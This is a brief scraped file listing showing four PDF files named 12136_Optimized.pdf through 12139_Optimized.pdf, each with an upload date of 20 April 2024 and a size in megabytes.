20.04.202416.32 Mб12136_Optimized.pdf
#
20.04.202416.48 Mб12137_Optimized.pdf
#
20.04.202411.38 Mб12138_Optimized.pdf
#
20.04.202414.93 Mб12139_Optimized.pdf